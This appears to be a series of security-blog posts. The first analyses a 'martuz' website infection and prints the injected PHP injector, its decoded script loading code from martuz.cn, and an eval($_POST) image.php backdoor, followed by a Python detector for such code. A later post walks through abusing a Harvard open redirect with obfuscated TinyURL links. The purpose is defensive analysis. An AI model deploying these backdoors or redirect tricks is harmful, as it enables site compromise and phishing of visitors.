(php tag removed) if(!fun ct ion_ex ists('tmp_lkojfghx')){if(is set ($_POST['tmp_lkojfghx3'])) eval($_POST['tmp_lkojfghx3']) ;if(!defined('TMP_XHGFJOKL')) define('TMP_XHGFJOKL',b ase64_de cod e('PHNjcmlwdCBsYW5ndWFnZT 1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBWaXRMPSclJzt2YXIgU3VvPSd2YXJfMjB hXzNkXzIyU2NyaV83MHRFbmdfNjluZV8yMl8yY2JfM2RfMjJWZXJzaV82Zm4oKStfMjJfMmNqX zNkXzIyXzIyXzJjdV8zZG5hdl82OWdfNjF0XzZmcl8yZV83NV83M182NXJfNDF nZW50XzNiaWYoXzI4dV8yZWluZGV4T2ZfMjhfMjJfNDNocl82Zl82ZGVfMjIpXzNjXzMwXzI5XzI2 XzI2KHVfMmVpbmRfNjV4T2YoXzIyV182OV82ZV8yMilfM2UwKV8yNl8yNl8 yOHVfMmVpbmRleF80Zl82Nl8yOF8yMk5UXzIwNl8yMilfM2MwKV8yNl8yNihfNjRvY183NW1fNjV uXzc0XzJlXzYzb29rXzY5ZV8yZWluXzY0ZXhPZihfMjJtaWVrXzNkMV8yMil fM2NfMzApXzI2XzI2KF83NHlwZW9fNjYoXzdhXzcyXzc2enRzXzI5XzIxXzNkdHlwXzY1b182NihfMjJ BXzIyKSkpXzdienJfNzZ6Xzc0c18zZF8yMkFfMjJfM2Jldl82MWwoXzI yaWYoXzc3aW5kXzZmd18yZV8yMithXzJiXzIyKWpfM2RqK18yMitfNjErXzIyXzRkYWpvcl8yMl8yY mIrYStfMjJNaW5vcl8yMitiK2ErXzIyQl83NWlfNmNkXzIyXzJiYitfMjJ qXzNiXzIyKV8zYmRvY183NW1fNjVfNmVfNzRfMmV3cml0ZShfMjJfM2NfNzNfNjNyaV83MF83NF8y MHNfNzJjXzNkXzJmXzJmbWFyXzIyK18yMl83NF83NXpfMmVfNjNuXzJmdml kXzJmXzNmXzY5ZF8zZF8yMitfNmErXzIyXzNlXzNjXzVjXzJmc2NyaXBfNzRfM2VfMjJfMjlfM2JfN2Qn O2V2YWwodW5lc2NhcGUoU3VvLnJlcGxhY2UoL18vZyxWaXRMKSkpfSk oKTsKIC0tPjwvc2NyaXB0Pg=='));fu nc tion tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(su bstr($s,10,-8)); if(preg_match_all('#<script(.*?)</sc ri pt>#is',$s,$a))for ea ch($a[0] as $v) if(count(exp lo de("\n",$v))>5) {$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_m atch('#[\(\[](\s*\d+,){20,}#',$v); if((pr eg_match('#\beval\b#',$v)&&($e||str pos($v,'from Char Code')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);} $s1=preg_re pl ace('#<sc ri pt lan gu age=java scri pt><!-- \n\(fun ct ion\(.+?\n --></script>#','',$s);if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))
$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0) {$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d); foreach(@ob_get_status(1) as $v) if(($a=$v['name'])=='tmp_lkojfghx')re t urn;else $s[]=array($a=='default output handler'?false:$a); for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx'); for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2') $GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

The base64_decode section evaluates to this:

<script language=javascript><!--
(f u n c t i o n(){var VitL='%';var Suo='var_20a_3d_22Scri_70tEng_69ne_22_2cb_3d_22Versi_6fn()+_ 22_2cj_3d_22_22_2cu_3dnav_69g_61t_6fr_2e_75_73_65r_41gent_3bif (_28u_2eindexOf_28_22_43hr_6f_6de_22)_3c_30_29_26_26(u_2eind_65xOf(_22W_69_6e_22) _3e0)_26_26_28u_2eindex_4f_66_28_22NT_206_22)_3c0)_26_26 (_64oc_75m_65n_74_2e_63ook_69e_2ein_64exOf(_22miek_3d1_22)_3c_30)_26_26(_74ypeo _66(_7a_72_76zts_29_21_3dtyp_65o_66(_22A_22))) _7bzr_76z_74s_3d_22A_22_3bev_61l(_22if(_77ind_6fw_2e_22+a_2b_22)j_3dj+_22+_61+_ 22_4dajor_22_2bb+a+_22Minor_22+b+a+_22B_75i_6cd_22_2bb+_22j_3b_22) _3bdoc_75m_65_6e_74_2ewrite(_22_3c_73_63ri_70_74_20s_72c_3d_2f_2fmar_22+_22_ 74_75z_2e_63n_2fvid_2f_3f_69d_3d_22+_6a+_22_3e_3c_5c_2fscrip_74_3e_22_29_3b_7d'; e v a l(un esc ape(Suo.replace(/_/g,VitL)))})(); --></script>

Which deobfuscates to:

var a="S cri ptE ng ine",b="Version()+",j="",u=na vi g ator.user A gent;if((u.indexOf("Ch rome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&& (do cu ment.coo kie.ind exOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";ev al("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;"); doc um ent.w ri te("<sc ri pt src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>");} if(window.Script Engine)j=j+ScriptEng ineMajorVersion()+ScriptEng ineMinorVersion()+Scrip tEngine BuildVersion()+j; <script src=//martuz.cn/vid/?id=></script>

a typical martuz infection.

Using PowerGrep we did a search and replace on this text and replaced every occurrence with “”.

We dug further into the files returned by our search for the word “base64_decode” and found 2 php files in every folder named “images”. These 2 files were named “image.php” and “gifimg.php” and inside each was the following code:

(php tags removed) eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); (php tags removed)

Which decodes to:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));

Which simply decodes and executes (via eval) whatever text string is POSTed to this file.

To test, we encoded some commands and set up a little script to POST to this form with our commands. It worked!
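Both the image.php payload and the tmp_lkojfghx code hand request data to eval, the first behind a base64 layer. This added checker (not the post’s grep/PowerGrep workflow) peels eval(base64_decode()) wrappers and flags any layer that evaluates $_POST/$_GET data; the image.php blob is the one quoted above, while the nested and benign samples are constructed.

```python
import base64
import binascii
import re

# eval(base64_decode('...')) with the blob captured; whitespace allowed inside (wrapped blobs).
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.I)
# eval() fed straight from a request variable, decoded or not: the backdoor's real shape.
REQUEST_EVAL_RE = re.compile(
    r"eval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)


def decode_layers(php_source, max_depth=5):
    """Peel eval(base64_decode()) wrappers; returns [original, layer1, layer2, ...]."""
    layers = [php_source]
    text = php_source
    for _ in range(max_depth):
        m = EVAL_B64_RE.search(text)
        if not m:
            break
        try:
            blob = re.sub(r"\s+", "", m.group(1))
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break
        layers.append(text)
    return layers


def is_request_eval_backdoor(php_source):
    """True if any layer evaluates attacker-supplied request data."""
    return any(REQUEST_EVAL_RE.search(layer) for layer in decode_layers(php_source))


# The image.php / gifimg.php body quoted in the post, PHP tags added back (the blob keeps the
# line-wrap space the page shows, which the decoder strips).
INNER = ("eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb "
         "J2UnXSkpOw=='));")
IMAGE_PHP = "<?php " + INNER + " ?>"
# Constructed: the same payload wrapped in a second base64 layer, to show the peeling.
NESTED_PHP = "<?php eval(base64_decode('" + base64.b64encode(INNER.encode()).decode() + "')); ?>"
# Constructed benign use of base64_decode (image data, no eval): must not be flagged.
BENIGN_PHP = "<?php $png = base64_decode('iVBORw0KGgo='); header('Content-Type: image/png'); echo $png; ?>"

if __name__ == "__main__":
    for name, src in (("image.php", IMAGE_PHP), ("nested", NESTED_PHP), ("benign", BENIGN_PHP)):
        print(name, len(decode_layers(src)), "layer(s), backdoor:", is_request_eval_backdoor(src))
```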

In addition to these 2 files we found many others in various folders that contained the same code. We’re working on determining how these files are named. It almost seems random, but in order for this to be an automated process we feel that there must be some algorithm in creating the file names. Otherwise, the cybercriminals would have to keep a database or list of each site name and the file name associated with that site. This is highly unlikely as they are into automated routines and keeping a list like that just doesn’t make much sense.

Being that this was martuz, we felt confident in recommending that the client change from FTP to either FTPS or SFTP and then scan their PC fully before accessing the site again. With this new twist of having these php files accept scripts and run them, we are concerned about this new form of infection.

We have seen some people report that you have to replace these php files with an empty file of the same name. That might be the case in some situations, none that we’ve seen, but that would require that the cybercriminals had another file on your site that monitored those files. That monitoring program needs to be found and eliminated.

Another interesting thing about the file names is that WordPress installations have files named image.php obviously with different code, but that tactic might be to deter people from just “willy nilly” deleting those files.

Stay tuned as we have many, many more websites to clean. We’ll be reporting on them as we obtain more information.

Paul McCartney's Web Site Hacked – "Back in the USSR"

Yes it’s true. The rock n roll icon Paul McCartney had his website hacked. (This attack isn’t necessarily originating in Russia, but I couldn’t refuse the obvious opportunity.)

It’s amazing how certain hackings follow the news. It was just a couple days ago when I was watching the news on TV (yes that old, outdated media) and learned that Paul McCartney and Ringo Starr were going to get back together for a “reunion” tour.

The website hacking could have been purely coincidental, as the toolkit planted on his website – Luckysploit, has been used in many, many recent website malware distributions. It could be that the cybercriminals behind this exploit  just happened to find this site vulnerable to their recent attack. I believe it’s irrelevant how or why, their timing was impeccable.

This is another example of social engineering used successfully to infect more computers.

Think of the millions of Beatles fans (my father-in-law is one of them – a fan not a virus victim) hearing about this reunion and flocking to Mr. McCartney’s website to find out where their concerts will be performed, only to find out at the next anti-virus scan that they’ve been compromised by a bank login and password stealing virus.

The nerve of these hackers. Using something so “in the news” to lure millions of people to  infectious websites that have been planted with malicious code, appearing to be legitimate websites, for the sole purpose of delivering a virus that is currently evading detection by many anti-virus programs.

Is there no shame?

This attack is being carried out by the Zeus botnet. Yes while everyone was watching out for Conficker, many forgot about the other botnets out there.

It’s easy to spot the infectious malware code in the “source” of the web page. All you have to do is look for something that’s impossible to read because it is encrypted and obfuscated to avoid easy detection. Luckily for us, we don’t look for specific infections while scanning websites. Our systems are based on any changes to a website. We pay close attention to changes that include specific keywords, but our alert system is based on any changes made to a website.

Once again the cybercriminals use a popular event to spread their malware. This particular infection will steal banking credentials which are then sold on the open black market. This is one of the cybercriminals profit centers. They have many.

Be careful when using the Internet, you never know if you’re getting more than you bargained for.

Other Beatles songs that come to mind, with my subtitles:

“Do You Want to Know a Secret” (about my malware)

“Don’t Ever Change” (my website)

“Don’t Let Me Down” (please click on this infectious link)

“Eight Days a Week” (and I’ll infect you every one of them)

“Everybody’s Got Something to Hide Except Me and My Monkey” (okay maybe my monkey has some malware to hide too)

“Fixing a Hole” (in your website)

“Free as a Bird” (free as in free malware)

“From Me to You” (more malware from me to you)

“Get Back” (to where you can get infected)

“Got To Get You Into My Life” (so I can hack you some more)

“Help!” (I need the services of WeWatchYourWebsite)

“I Am the Walrus” (I live Belarus) (okay you find something that goes with Walrus)

I could go on, but the Beatles wrote a lot of songs and I need to save server space.

Let’s be careful out there…

Social Networks & Social Engineering – Twitter Round 2

Continuing on from Round 1, I decided to take a step further and show you exactly how susceptible you are to a socially engineered infection through Twitter. Actually it’s more an attack through TinyURL.com, but since Twitter automatically converts URLs in your Tweets (ugh!), it is an attack via Twitter.

For this example, let’s say that a hacker wants to construct a website that references some research on Harvard’s website. It would be on a topic that is of high interest at the moment.

First the hacker (cybercriminal) would use Google Trends (www.google.com/trends) to see what’s hot. As of today (03/02/2009) the list is as follows:

  • granville waiters
  • nyc doe
  • wavy tv 10
  • new york city department of education
  • dr. seuss birthday
  • opm.gov
  • wvec
  • nyc public school closings
  • nyc board of education
  • newport news public schools

These are the top 10.

Nothing in there is really eye-catching or covers a broad range of people. I’ll use dr. seuss birthday.

Our cybercriminal would construct some basic information about how Harvard University has created this research paper detailing the events behind Dr. Seuss stories. Our cybercriminal needs to have something that already indicates some legitimacy and some validation. For this scenario I’m using Harvard University for two reasons: they already carry a huge credibility factor, and they have a cross-site scripting (XSS) vulnerability that lets me use their URL for redirection.

The cybercriminal would take the XSS URL and instead of redirecting the reader to another page inside of Harvard’s website, use it to redirect the unsuspecting reader to their malicious website.

Here is the original URL: http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=

By appending any URL we want to the end of the above string, it will look like we’re sending you to harvard.edu; however, this vulnerability will actually take you somewhere else.

For instance, if I wanted to send you to my website I would use:

http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=http://www.wewatchyourwebsite.com

Go ahead and click on that and you’ll see what I mean.

Now, that’s not too bad. If I showed you that link in an email or on my Twitter account, you might not see the end of the URL and just click on it to see what Harvard has to say about Dr. Seuss.

But remember that Twitter uses TinyURL.com, which converts any long URL into a “tiny” URL. Plugging that long URL into TinyURL.com’s website gives me:

http://www.tinyurl.com/av46js

With TinyURL.com’s preview function I could see the exact URL of the above TinyURL. Maybe you’d see the redirection at the end and maybe not.

Now, our crafty cybercriminal knows that TinyURL.com has this preview function, so he (we’ll assume a male hacker) converts the URL of his malicious website to one you can’t recognize. This is called URL obfuscation (I love using that word).

This would take my URL of http://www.wewatchyourwebsite.com and convert it to: %68%74%74%70%3a%2f%2f%77%77%77%2e%77%65%77%61%74%63%68%79%6f%75%72%77%65%62%73%69%74%65%2e%63%6f%6d

If you saw this by itself, hopefully you’d be suspicious and avoid the urge to click on it. However, when used at the tail end of an already long URL, you might just throw caution to the wind and click away.

Our Harvard URL would become:

http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=%68%74%74%70%3a%2f%2f%77%77%77%2e%77%65%77%61%74%63%68%79%6f%75%72%77%65%62%73%69%74%65%2e%63%6f%6d

Which, when converted to a TinyURL.com link, would result in: http://tinyurl.com/bnq5ej

Go ahead and click on that to see what I mean. As of today, that XSS on Harvard’s site has not been fixed, so it will load their frame, but inside will be our home page. Keep in mind that even with TinyURL.com’s preview function, you would only see the obfuscated URL with all the percent signs. This might give you a false sense of security, and you might decide to trust your “gut” and go for it. That’s what the cybercriminal is hoping for.

Obviously our website isn’t going to infect your computer; however, if the redirection URL were to take you to the cybercriminal’s infectious webpage, you’d be infected and not even know it.
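As an added example (not code from the original post), here is a small Python link-inspection check for the two Harvard URLs quoted above: it percent-decodes each query parameter, flags any whose value resolves to a host other than the link’s own, and counts escapes that hide otherwise readable characters, which is exactly what the obfuscated form does. The function names, the double-decoding loop and the protocol-relative case are my own assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed from the two Harvard URLs quoted in the post: the first carries the
# redirect target in the clear, the second carries it percent-encoded.
PLAIN_URL = ("http://hms.harvard.edu/lshell/WhitePagesdefault.asp"
             "?task=staffandfaculty&theurl=http://www.wewatchyourwebsite.com")
OBFUSCATED_URL = ("http://hms.harvard.edu/lshell/WhitePagesdefault.asp"
                  "?task=staffandfaculty&theurl=%68%74%74%70%3a%2f%2f%77%77%77%2e%77%65"
                  "%77%61%74%63%68%79%6f%75%72%77%65%62%73%69%74%65%2e%63%6f%6d")

PCT_ESCAPE = re.compile(r"%([0-9A-Fa-f]{2})")
# RFC 3986 "unreserved" characters never need escaping; escaping them only hides a readable URL.
UNRESERVED = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~")


def needless_escapes(raw: str) -> int:
    """Count %XX escapes in raw text that decode to an unreserved character."""
    return sum(1 for m in PCT_ESCAPE.finditer(raw)
               if chr(int(m.group(1), 16)) in UNRESERVED)


def full_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded targets (%2568 -> %68 -> h) are revealed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_hidden_redirects(url: str) -> list:
    """Flag query parameters whose decoded value is a URL on a different host than the link itself."""
    parts = urlsplit(url)
    own_host = parts.netloc.lower()
    findings = []
    for pair in parts.query.split("&"):
        name, _, raw_value = pair.partition("=")
        target = urlsplit(full_decode(raw_value))
        # scheme "" covers protocol-relative targets such as //other.example (assumption)
        if target.scheme in ("http", "https", "") and target.netloc and target.netloc.lower() != own_host:
            findings.append({
                "param": name,
                "target_host": target.netloc.lower(),
                "needless_escapes": needless_escapes(raw_value),
            })
    return findings
```

Run against the obfuscated link, the check reports the same off-site target as the plain link plus 30 needless escapes, so a link checker can treat a high escape count on a redirect parameter as a reason to stop and look before following the shortened URL.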

To recap, the purpose of this information is to show you the steps a cybercriminal would follow to use social engineering to spread their malware. They would use Google Trends to find a hot topic; they would use the credibility of some other site, Harvard in this example; they would use obfuscation to hide their work from people who know what to look for; and they would use Twitter or some other social networking site to reach as many people as they could.

As stated earlier, this isn’t so much a vulnerability of Twitter as it is with TinyURL.com, but since Twitter uses TinyURL.com, it does reflect back on them.

Any comments, questions or remarks? Please post them (unless it’s SPAM).

Social Networks & Social Engineering – Twitter Round 1

My first review will be Twitter. I selected Twitter because it’s widely used and even easier for social engineering than some of the others.

First a little background on Twitter. Many people categorize Twitter as a “micro” blog. This means you can post short (140 character) messages that communicate your current thoughts, actions, wants or needs.

On their website, Nicholas Carr describes it as “the telegraph system of Web 2.0”, while the New York Times states, “It’s one of the fastest growing phenomena on the Internet.”

The first thing I noticed about Twitter is that most links posted by members are the shortened version of a full URL. Some of the more popular sites for these services are:

  • TinyURL.com
  • bit.ly
  • get-shorty.com
  • SnipURL.com

These services take a URL like: http://www.wewatchyourwebsite.com/defacements/HackedByAL-GaRNi-sample-2.jpg and convert it to something like: www.tinyurl.com/88888

Using these shortened URLs on Twitter allows members to include some description with their link.

I’ve always had a problem with these shortened URLs. Having seen numerous SPAM messages with embedded shortened URLs in order to evade detection, I set out to investigate further.

You never know what the ultimate destination is when clicking on these links. You could easily be led to an infectious webpage. Infectious websites are one of the most popular tactics of cybercriminals to deliver their malware.

I scanned our SPAM traps for messages that included these shortened URLs. I used one of our secured systems to see where these links ultimately delivered my browser.

Much to my surprise, all of the links that used TinyURL.com delivered the following message:

“The TinyURL (shows link) you visited was used by its creator in violation of our terms of use. TinyURL has a strict no abuse policy and we apologize for the intrusion this user has caused you. Such violations of our terms of use include:

  • Spam – Unsolicited Bulk E-mail
  • Fraud or Money Making scams
  • Malware
  • or any other use that is illegal”

This tells me that they’re either policing their links or that they actually take action on misuse of their service – this is awesome. I suggest that before clicking on any TinyURL, you replace tinyurl.com with preview.tinyurl.com. For instance, if you see a link like http://www.tinyurl.com/8888, before clicking on it, change the URL to http://preview.tinyurl.com/8888. The resulting webpage will show you exactly where the link will take you, with a link that says, “Proceed to this site.”

I know this is somewhat of an inconvenience, but so is having your PC sending millions of SPAM messages after you’ve been added to a huge botnet.

You see, with any security situation, you always have to consider the risk involved when the potentially weakest link is the responsibility of someone else.

With these shortened URLs, you’re depending on the URL shortening service to provide you with some level of protection.

One other service I investigated, SnipURL.com, clearly states on their website:

“SnipURL has a number of operational functions in place to protect the confidentiality of information. However, perfect security on the Internet does not exist, and SnipURL does not warrant that its site is impenetrable or invulnerable to hackers.”

At least they admit that perfect security does not exist, but don’t think that you’re safe clicking on a shortened URL link.

I believe that any free service is going to be exploited by cybercriminals. I’ve seen many times where even fee based services are abused by cybercriminals.

You had better fully trust the person or organization behind the Twitter posting before you blindly click on a shortened link on their site, because you’re relying on either the poster or Twitter. If that little bird in your head is telling you to be careful, you shouldn’t be clicking on it, no matter how important you think it might be.

Have you had situations of a security breach on Twitter? If so, let us know by posting a comment.

Social Networks & Social Engineering – What a Pair

When we started this service we knew that one of our main goals was to “get the word out” on how websites have been in the line of fire for cybercriminals. We published a report, “How Cybercriminals Use Your Website to Distribute their Malware”, but found not many people were interested in what we had to say. We blamed it on a “head in the sand” mentality.

We looked to the Internet Marketing world to see how they do it. Some of them have actually sold thousands of e-books for as much as $27 a piece. They must know some secret that we didn’t.

Our studying introduced us to the works of some big name Internet Marketers (IMers). Names like Frank Kern, Jeff Walker, Brian Clark, Yanik Silver and many others all seemed to echo one key strategy – build community. One of their favorite strategies is using social networks to build this community of loyal followers.

I shouldn’t say it’s one of their strategies; it’s one of their tactics. Their strategy is to always provide something of value. Social networks are just one way they suggest you use to distribute your valuable message.

Using social networks seemed like a great idea so I set out to explore this value distribution tactic. I did this with my ever present security guard on – that’s how I roll.

My exploration included sites like: Twitter, MySpace, Facebook, LinkedIn and FastPitch.

Over the next few weeks I’ll be revealing my findings and then suggest ways (tactics) you can protect your informational assets while taking advantage of social networks.

I titled this posting “Social Networks & Social Engineering – What a Pair” because many of the tactics of cybercriminals revolve around social engineering which is the art of deceiving others into clicking on a link that you think is safe.

As I write this, I’ve been bombarded with emails about people who received errors while trying to view someone’s profile on Facebook. What happens is that when someone clicks on your profile they get an error saying that they can find out the problem by installing the “Error Check System”. You’ll get notifications that “X” number of people have been getting errors while viewing your profile and that this “application” will help you determine the cause.

If you Google “Error Check System” Facebook, at least one of the links takes you to an infectious website that will display a message telling you that you’re infected with a virus and offer to scan your system. Of course, this is a social engineering attempt. If you agree to the scan, you’ll be downloading a virus. This has been a very popular tactic of cybercriminals lately. They have even started creating websites that offer reviews of anti-virus software – more social engineering, to earn your trust.

I thought the timing of this Facebook “Error Check System” scam was perfect for me to start this series.

Come on back and read the follow-ups.

If you’ve had any experiences with one of the social networking sites, post a comment and let us know.